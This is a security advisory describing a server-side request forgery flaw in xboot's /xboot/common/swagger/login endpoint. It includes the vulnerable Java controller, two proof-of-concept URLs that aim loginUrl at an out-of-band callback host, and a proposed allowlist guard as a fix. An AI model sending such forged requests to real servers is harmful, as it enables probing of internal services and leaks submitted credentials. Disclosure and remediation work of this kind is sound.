Summary
An SSRF vulnerability was discovered on the endpoint /xboot/common/swagger/login in the latest version (v3.3.4) of xboot. The loginUrl parameter, which sets the target of the server-side HTTP request, is user-controllable and is not validated before use, so an attacker can make the server issue requests to arbitrary hosts and use this to probe and exploit internal services of the target system.
Details
- xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/SecurityController.java
```java
@RestController
@Api(tags = "Security相关接口")
@RequestMapping("/xboot/common")
@Transactional
public class SecurityController {

    @RequestMapping(value = "/needLogin", method = RequestMethod.GET)
    @ApiOperation(value = "没有登录")
    public Result<Object> needLogin() {
        return ResultUtil.error(401, "您还未登录");
    }

    @RequestMapping(value = "/swagger/login", method = RequestMethod.GET)
    @ApiOperation(value = "Swagger接口文档专用登录接口 方便测试")
    public Result<Object> swaggerLogin(@RequestParam String username, @RequestParam String password,
                                       @ApiParam("图片验证码ID") @RequestParam(required = false) String captchaId,
                                       @ApiParam("验证码") @RequestParam(required = false) String code,
                                       @ApiParam("记住密码") @RequestParam(required = false, defaultValue = "true") Boolean saveLogin,
                                       @ApiParam("可自定义登录接口地址")
                                       @RequestParam(required = false, defaultValue = "http://127.0.0.1:8888/xboot/login")
                                       String loginUrl) {
        Map<String, Object> params = new HashMap<>(16);
        params.put("username", username);
        params.put("password", password);
        params.put("captchaId", captchaId);
        params.put("code", code);
        params.put("saveLogin", saveLogin);
        // loginUrl comes straight from the request and is used as the outbound target
        String result = HttpUtil.post(loginUrl, params);
        return ResultUtil.data(result);
    }
}
```
POC
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://dnslog/&username=x&password=x
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://d1vif4ev0le7bmrt4se0gjs1qcw1a5jgw.oast.me&username=x&password=x
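The safest fix is to drop the client-supplied loginUrl entirely and use a server-side configured value; note that the handler also POSTs the submitted username and password to whatever URL is given. Where the parameter must remain, the following added example (hypothetical code, not part of xboot) shows an exact-match allowlist guard that swaggerLogin could call before HttpUtil.post; the class name LoginUrlGuard and the allowlist contents are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

/** Hypothetical allowlist guard for swaggerLogin's loginUrl parameter (not xboot's own code). */
public final class LoginUrlGuard {

    // Exact login endpoints this server may forward credentials to. Entries carry an
    // explicit port and path so the comparison below is unambiguous. In a real deployment
    // this comes from server-side configuration, never from the request.
    private static final Set<String> ALLOWED_LOGIN_URLS =
            Set.of("http://127.0.0.1:8888/xboot/login");

    private LoginUrlGuard() {}

    /** Returns true only if loginUrl is an absolute http(s) URL matching an allowlisted endpoint. */
    public static boolean isAllowed(String loginUrl) {
        if (loginUrl == null || loginUrl.isBlank()) {
            return false;
        }
        final URI uri;
        try {
            uri = new URI(loginUrl).normalize();   // collapses "/./" and "/../" path segments
        } catch (URISyntaxException e) {
            return false;                          // unparseable input is never forwarded
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) {
            return false;   // relative URLs and non-hierarchical schemes have no origin
        }
        scheme = scheme.toLowerCase(Locale.ROOT);
        if (!scheme.equals("http") && !scheme.equals("https")) {
            return false;   // file:, gopher:, dict: and similar schemes are rejected outright
        }
        if (uri.getRawUserInfo() != null || uri.getRawQuery() != null || uri.getRawFragment() != null) {
            return false;   // rejects "http://127.0.0.1:8888@other.host/" and query/fragment tricks
        }
        int port = uri.getPort() != -1 ? uri.getPort() : (scheme.equals("https") ? 443 : 80);
        String canonical = scheme + "://" + host.toLowerCase(Locale.ROOT) + ":" + port + uri.getRawPath();
        return ALLOWED_LOGIN_URLS.contains(canonical);
    }
}
```

With this guard, both POC URLs above are rejected (canonical forms "https://dnslog:443/" and "https://...oast.me:443/" are not allowlisted) while the default "http://127.0.0.1:8888/xboot/login" still passes; the controller would return an error instead of calling HttpUtil.post when isAllowed returns false.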
Impact
https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks